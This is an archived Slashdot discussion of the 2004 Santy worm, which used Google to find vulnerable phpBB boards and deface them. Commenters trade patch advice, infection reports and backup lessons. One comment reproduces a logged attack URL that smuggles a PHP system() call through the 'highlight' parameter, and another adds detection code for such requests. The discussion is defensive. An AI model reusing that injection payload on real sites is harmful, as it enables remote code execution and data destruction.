Stories
Slash Boxes
Comments
Search

News for nerds, stuff that matters

Slashdot Log In

Log In

Create Account  |  Retrieve Password

Net Worm Uses Google to Spread

Posted by michael on Tue Dec 21, 2004 05:15 PM
from the web-service-takes-on-new-meaning dept.
Security Worms Businesses Google The Internet PHP Programming
troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist if you use Microsoft's Search engine to scan for the phrase 'NeverEverNoSanity'-- part of the defacement text that the Santy worm uses to replace files on infected Web sites--returns nearly 39,000 hits." Reader pmf sent in a few more information links: F-Secure weblog and Bugtraq posting. Update: 12/22 03:34 GMT by T : ZephyrXero links to this news.com article that says Google is now squashing requests generated by the worm.
+ -
story
This discussion has been archived. No new comments can be posted.
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.

Net Worm Uses Google to Spread 50 Comments More /

 Full
 Abbreviated
 Hidden
More
Loading... please wait.

  • Quick! (Score:5, Funny)

    by Anonymous Coward on Tuesday December 21 2004, @05:16PM (#11153152)
    Someone figure out a way to blame this on Microsoft!

  • Under the Google radar (Score:5, Interesting)

    by Meostro (788797) * on Tuesday December 21 2004, @05:16PM (#11153153) Homepage Journal
    I saw this yesterday on a.... uhh... "anatomic reference" site:
    This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

    I tried to find some kind of reference and Googled [google.com] for it, but I got no results.

    Still nothing on it, wonder how long it'll be before it shows up?

    MSN search [msn.com] returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta [msn.com] engine for the article.
    • even better, I did a search on the beta msn site for 'NeverEverNoSanity WebWorm generation' [msn.com], the best that I got as a search result was 20 (well the first couple of pages), but the site read 11 when I went to it, I suppose that the worm is writing over it's own defacement.

    • Re:Under the Google radar (Score:5, Informative)

      by orangesquid (79734) <orangesquid&yahoo,com> on Tuesday December 21 2004, @05:58PM (#11153609) Homepage Journal
      You can search for specific generations ( http://beta.search.msn.com/results.aspx?q=%22Never EverNoSanity+WebWorm+generation+4%22&FORM=QBRE ) to see the spread:
      0, 1, 2, 3 - no hits
      4 - 2335 hits
      5 - 9297 hits
      6 - 7218 hits
      7 - 7288 hits
      8 - 10746 hits
      9 - 12009 hits
      10 - 11752 hits
      11 - 14866 hits
      12 - 13267 hits
      13 - 8393 hits
      14 - 13317 hits
      15 - 3840 hits
      16 - 5004 hits
      17 - 1950 hits
      18 - 3344 hits
      19 - 6 hits
      20 - 1 hit
      21 - 3 hits
      22 - 1 hit
      23 - 1 hit
      24 - 1 hit
      25, 26, 27, 28, 29, 30 - no hits

      • Re:Under the Google radar (Score:2, Informative)

        by Anonymous Coward
        umm.. that's just the eicar.com AV test file.. not really a virus - just a file that sets off your AV software so you know it's working. why is this informative?

  • Head line is way to misleading (Score:5, Informative)

    by mkop (714476) * on Tuesday December 21 2004, @05:16PM (#11153155) Journal
    There is nothing wrong with google. only with people who have not pathced the php buletin boards

  • Poor /. (Score:5, Funny)

    by roman_mir (125474) on Tuesday December 21 2004, @05:17PM (#11153157) Homepage
    I think this virus/worm hit /., when I clicked on the link to this article, all I saw was: "Nothing for you to see here. Please move along."

  • Latest Version of phpBB Unaffected (Score:5, Informative)

    by akiy (56302) on Tuesday December 21 2004, @05:17PM (#11153168) Homepage
    It looks like the latest phpBB version 2.0.11 [phpbb.com]or a simple patch [phpbb.com] will thwart the worm, though. Time to upgrade if you haven't yet!
    • > It looks like the latest phpBB version 2.0.11 or a simple patch will thwart
      > the worm, though. Time to upgrade if you haven't yet!

      That's alright. All the lazy admins will blame Google and everything will be okay!

      This, I suspect, is going to be a new way of infecting web-based apps. Just do a search for the vulnerable software on Google, Yahoo or whatever, pop in, do your damage and be on your way.

      Of course, it will get much worse if its some sort of E-commerce software or something like that a

      • Re:Latest Version of phpBB Unaffected (Score:4, Insightful)

        by topynate (694371) on Tuesday December 21 2004, @05:29PM (#11153308)
        Given that probably 90% of script kiddies find targets with Google, it could only be a matter of time before someone automated the process.

        Maybe it's a theme - the worms of tomorrow will do what the script kiddies of today do.

      • phpBB is very hard to upgrade.

        To install many plugins requires making changes to the source by hand. Some of the websites I host have several of these, and I'm not even sure which ones (I didn't add them).

        Plus, if you use a custom theme you have to recreate it after upgrading, which is a right pain in the arse as all the paths are hardcoded... even with sed/grep it takes an hour or two to turn subSilver into CustomSilver.

    • Re:Latest Version of phpBB Unaffected (Score:5, Informative)

      by Cutriss (262920) on Tuesday December 21 2004, @05:26PM (#11153278) Homepage
      Yes and no.

      It will protect your boards from being targeted by the Google component of the worm. However, if your boards are running on a shared server, and someone else has a vulnerable version of phpBB installed on their space, you could still be vulnerable. The worm is designed to poke around once it manages to lodge itself inside a host.

      Ordinarily, you could just blame those infected in this manner for not using proper permissions on their board installs, but with the amount of custom modifications many people have installed on their boards, it'd be no surprise if 90% of the people that think they're safe actually aren't. Make sure your files aren't writeable, folks.
    • Good job. You do know that by Slashdotting the phpBB.com server, you're preventing people from patching, right? :)
  • it can always use Google Suggest to find victims. :)
  • Microsoft search beats Google at indexing pages hacked by this virus! MS Search turns up 39000 pages, google turns up zero on the same nonsense keyword!

  • Infect Slashdot (Score:5, Funny)

    by somethinghollow (530478) on Tuesday December 21 2004, @05:18PM (#11153179) Homepage Journal
    When it infects sites running SlashCode, it pretends to be a legitament post (so it can get the defacement tag "NeverEverNoSanity" on the front page, then monitors for posting, and tries to get first post, too.

  • I got hit HARD! :( (Score:5, Interesting)

    by Broadband (602443) on Tuesday December 21 2004, @05:22PM (#11153238)
    This worm is unbelieveably evil.

    What it does is search all volumes on the server for files with the .asp .php .shtml .html .htm extentions and overwrites them with the 264 byte file that simply states "Web site defaced"

    I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

    I've been spening the past 24 hours picking up the pieces and trying to get everything back online. 1/2 Done now.

    If you want to see what a defaced website looks like go to: http://www.sherwoodoregon.com and check it out before i get that site back online.

    -BB
    • Unlucky generation 13, eh? I heard it was worse than the others.
      Yes, it was a lame joke. I couldn't think of anything better :(
    • According to W3C, It's not even valid [w3.org] HTML 2.0. The least they could do is write valid code. Sheesh.

    • Re:I got hit HARD! :( (Score:2, Informative)

      by Anonymous Coward
      That's why I don't call it a backup if it's hot. If you just put in a second drive, it doesn't save you from 'rm -rf /' or from a power supply that commits suicide... and decides to take the rest of the hardware with it.

      Backups are on cold hardware, on a shelf. At the minimum. Preferably in another building.
    • This is the main issue with harddisks as backup. They don't provide security against these kind of attacks as they are just as vulnerable as any other disk attached to the system.

      A tape drive for backups may seem like a 'thing from the past', but it's *very* effective in these instances...

  • snort signatures (Score:4, Informative)

    by UnderAttack (311872) * on Tuesday December 21 2004, @05:26PM (#11153276) Homepage
    The ISC posted a couple of snort sigs [sans.org] and other details.

  • This is kind of sad... (Score:3, Funny)

    by The Hobo (783784) on Tuesday December 21 2004, @05:34PM (#11153364)
    I had forgotten the MSN beta search engine, so I just googled it...
  • So I get my present, in the mail, a little early.
    A new HDTV card...
    I go to download [pchdtv.com] the linux only drivers and...

    NeverEverNoSanity!!!

    Argh! &$@*#! Humbug.

  • For all of you saying it's a PHP exploit (Score:5, Informative)

    by VeneficusAcerbus (724294) on Tuesday December 21 2004, @05:43PM (#11153456)
    From ISC:
    Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case. The worm exploits the 'highlight' bug in phpBB 2.0.10 and earlier. The current version of phpBB (2.0.11, released Nov. 18th) fixes this problem. Nevertheless, its still a good idea to update php.

  • I got hit (Score:3, Insightful)

    by Ghoser777 (113623) <fahrenba@@@mac...com> on Tuesday December 21 2004, @05:43PM (#11153459) Homepage
    My poor linux box - I felt so secure and then this little worm gets out. Thank god I had some recent backups, otherwise this would have really sucked. I guess it's alright though - you have to get rooted one time before you really understand how vulnerable the internet makes all of us.
      • Not only keep up on patches, but also seperation of services. Your web server should run under a chrooted environment at minimum, as a non-privlidged user. Any files that doesn't need to be written to by the web applications (including html and cgi files) should be owned by a different user id (and not world-writable).

        The most secure setup I've come up with is setting up Usermode Linux (or Linux Vservers) so that I have a bunch of virtual OS's running, each with only the bare minimum libraries that are n

  • This one's fun to debug - perl via url (Score:5, Interesting)

    by falzbro (468756) on Tuesday December 21 2004, @05:58PM (#11153607) Homepage
    I got this on a few servers yesterday- first thought it was related to the < PHP 4.3.10 bugs- it's not.

    This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

    Here's the first line from the logfile:
    [20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca 3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)% 252echr(101)%252echr(114)%252echr(108)%252echr(32) %252echr(45)%252echr(101)%252echr(32)%252echr(34)% 252echr(111)%252echr(112)%252echr(101)%252echr(110 )%252echr(32)%252echr(79)%252echr(85)%252echr(84)% 252echr(44)%252echr(113)%252echr(40)%252echr(62)%2 52echr(109)%252echr(49)%252echr(104)%252echr(111)% 252echr(50)%252echr(111)%252echr(102)%252echr(41)% 252echr(32)%252echr(97)%252echr(110)%252echr(100)% 252echr(32)%252echr(112)%252echr(114)%252echr(105) %252echr(110)%252echr(116)%252echr(32)%252echr(113 )%252echr(40)%252echr(72)%252echr(89)%252echr(118) %252echr(57)%252echr(112)%252echr(111)%252echr(52) %252echr(122)%252echr(51)%252echr(106)%252echr(106 )%252echr(72)%252echr(87)%252echr(97)%252echr(110) %252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid= 2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%2 52Esystem(chr(112)%252echr(101)%252echr(114)%252ec hr(108)%252echr(32)%252echr(45)%252echr(101)%252ec hr(32)%252echr(34)%252echr(111)%252echr(112)%252ec hr(101)%252echr(110)%252echr(32)%252echr(79)%252ec hr(85)%252echr(84)%252echr(44)%252echr(113)%252ech r(40)%252echr(62)%252echr(109)%252echr(49)%252echr (104)%252echr(111)%252echr(50)%252echr(111)%252ech r(102)%252echr(41)%252echr(32)%252echr(97)%252echr (110)%252echr(100)%252echr(32)%252echr(112)%252ech r(114)%252echr(105)%252echr(110)%252echr(116)%252e chr(32)%252echr(113)%252echr(40)%252echr(72)%252ec hr(89)%252echr(118)%252echr(57)%252echr(112)%252ec hr(111)%252echr(52)%252echr(122)%252echr(51)%252ec hr(106)%252echr(106)%252echr(72)%252echr(87)%252ec hr(97)%252echr(110)%252echr(78)%252echr(41)%252ech r(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

    If you decode the ascii characters [asciitable.com], you get:

    perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

    I didn't have enough freetime to decode the whole thing due to.. actual work having to be done, but it's quite clever.

    --falz

    • Re:This one's fun to debug - perl via url (Score:3, Informative)

      by Anonymous Coward
      Dunno about you guys but I've been getting hits like that since NOVEMBER when the highlight bug first surfaced.

      You might want to amuse yourself with the following PHP code, add to viewtopic.php right after it checks "isset($HTTP_GET_VARS['highlight']))"...

      if (preg_match('/chr\(/', $HTTP_GET_VARS['highlight'])) {
      $h = preg_replace('/(?:%2e)?chr\((\d+)\)/ei', 'chr(\1)',
      $HTTP_GET_VARS['highlight']);
      $h = preg_replace('/%2e/i', '', $h);
      $h = preg_replace('/%27/', "'", $h);
      error_log("viewtopic ha

    • Looks like you didn't read the Bugtraq posting completely... There's an zip attachment with the fully decoded perl script.
      Download link [theaimsgroup.com]

  • MSN actually returns 207 results (Score:3, Informative)

    by bharatman (253051) on Tuesday December 21 2004, @06:03PM (#11153652)

    MSN's first page estimates are always grossly inflated. Try this link instead:

    http://beta.search.msn.com/results.aspx?q=NeverE ve rNoSanity&first=200&count=10&FORM=PERE4

    Note that I the "first" param is 200 (which is the equivalent of going to page 20). It hits the end of the results and revises its estimate.

  • My webserver just got hit by this (Score:3, Informative)

    by AC-x (735297) on Tuesday December 21 2004, @06:27PM (#11153845)
    Looking at all the automatic PHP error responses, it seems that as long as the web server's task does not have write access to the web sites folder you're safe.

  • Found this in my server logs (Score:3, Interesting)

    by Chatmag (646500) <editor@chatmag.com> on Tuesday December 21 2004, @09:09PM (#11155110) Homepage Journal
    http://www.hackgeneral.net/phpbb_exploit.php

    When I first saw that page a few days ago, it had several boxes for inputs, the site URL, code, and execute button. The page is now gone, and if someone speaks Spanish, please let us all know what the site is about.

    • Re:Hmmmm (Score:4, Informative)

      by Sikmaz (686372) on Tuesday December 21 2004, @05:29PM (#11153313)
      Different Exploit, that is a seperate problem that allows people to do even more bad things such as reading your config.php to get your sql password. A workaround is available from http://www.phpbbstyles.com/viewtopic.php?t=1903 if you can't install 4.3.10

      • Not PHP Bugs - phpBB exploit is used (Score:5, Informative)

        by a16 (783096) on Tuesday December 21 2004, @05:56PM (#11153582)
        As per the parent of this post, the post modded '+5 Informative' is false and includes the wrong announcement.

        This is not caused by the php bugs, it uses an issue in phpBB 2.0.10 and below. 2.0.11 fixes this, and has been available for ages (over a month).

        So in summary, if you use phpBB - upgrade to 2.0.11 now - not upgrading is not an option.

        I feel the above needs to be clarified, as there are already numerous people posting false information. Upgrading your PHP version won't protect against this (but you need to do it anyway to protect against other issues) - upgrading to phpBB 2.0.11 will. Simple :)

    • Dshield disagrees (Score:4, Insightful)

      by JustinXB (756624) on Tuesday December 21 2004, @05:31PM (#11153334)
      See here [sans.org]
      Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case.
      Who are you going to believe: Some news site or a security community?
    • As I posted above, that is a seperate problem that allows people to do even more bad things such as reading your config.php to get your sql password. A workaround is available from http://www.phpbbstyles.com/viewtopic.php?t=1903 if you can't install 4.3.10
      • Err crap, I shouldn't have copied and pasted my post isn't entirely clear in this context ;) This worm exploits a problem in PHPBB 2.0.10 that is fixed in 2.0.11. The other issue is a PHP problem that can be solved via the work around I posted above or using PHP 4.3.10.
    • No, as someone else already responded to other posts, it is a phpBB problem. phpBB calls the urldecode() function on form variables, after PHP already does so. It allows ' to bypass the magic quotes that php so lovingly puts on all our form data. The latest bug reports were reported after the release of the exploit for phpBB 2.0.10 and earlier. IIRC the report said that some scripts MAY be vulnerable, but didnt state for certain. As far as I know, no one has yet to release an exploit for the bugs, its
    • The virus is searching google for sites not yet infected. Googling [google.com] for "Powered by phpBB" does return results. Some of which are now defaced.

      If google wants to stop the virus then they could disable "Powered by phpBB" as a search term. The reason "NeverEverNoSanity" doesn't come up on google is becuase googlebot is extreamly slow to index new content on most sites.

    • Re:Clarification (Score:5, Informative)

      by ScottMacVicar (751480) * on Tuesday December 21 2004, @06:39PM (#11153960)
      I've been looking at the PHP related security hole and this does not have anything to do with the exploit the worm uses.

      The PHP exploit was to do with the length part of a serialized string, it wasn't correctly enforced and a suitably large enough value would crash a crash and print out contents of the stack which could include any variable within the script. s:1000:"test"; the 1000 part is not correctly checked.

      The phpBB exploit is regarding a remote code execution vulnerability, in this case it uses this vulnerability to fetch a perl script from a remote server and write it to the forum before executing it using the system command in PHP.

      So this worm only affects phpBB 2.0.10 and below.

All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest © 1997-2009 Geeknet, Inc.